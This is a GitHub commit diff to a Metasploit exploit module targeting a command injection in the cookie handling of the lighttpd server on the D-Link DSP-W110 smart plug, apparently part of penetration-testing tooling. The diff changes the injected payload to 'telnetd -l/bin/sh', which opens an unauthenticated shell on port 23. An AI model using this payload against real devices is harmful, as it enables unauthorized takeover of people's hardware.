Skip to content

Commit 1456374

Browse files
author
Michael Messner
committed
port, email, cleanup
1 parent 1b040f3 commit 1456374

File tree

1 file changed

+5
-7
lines changed

1 file changed

+5
-7
lines changed

modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb renamed to modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb

Lines changed: 5 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -18,11 +18,12 @@ def initialize(info = {})
1818
This module exploits an anonymous remote code execution vulnerability on different D-Link
1919
devices. The vulnerability is a command injection in the cookie handling process of the
2020
lighttpd web server when handling specially crafted cookie values. This module has been
21-
successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
21+
successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
22+
device.
2223
},
2324
'Author' =>
2425
[
25-
'Peter Adkins', # vulnerability discovery and initial PoC
26+
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
2627
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
2728
],
2829
'License' => MSF_LICENSE,
@@ -67,12 +68,9 @@ def exploit
6768

6869
print_status("#{peer} - Exploiting...")
6970

70-
telnetport = rand(32767) + 32768
71-
72-
cmd = "telnetd -p #{telnetport}"
73-
71+
cmd = "telnetd -l/bin/sh"
7472
execute_command(cmd)
75-
73+
telnetport = 23
7674
handle_telnet(telnetport)
7775
end
7876

0 commit comments

Comments
 (0)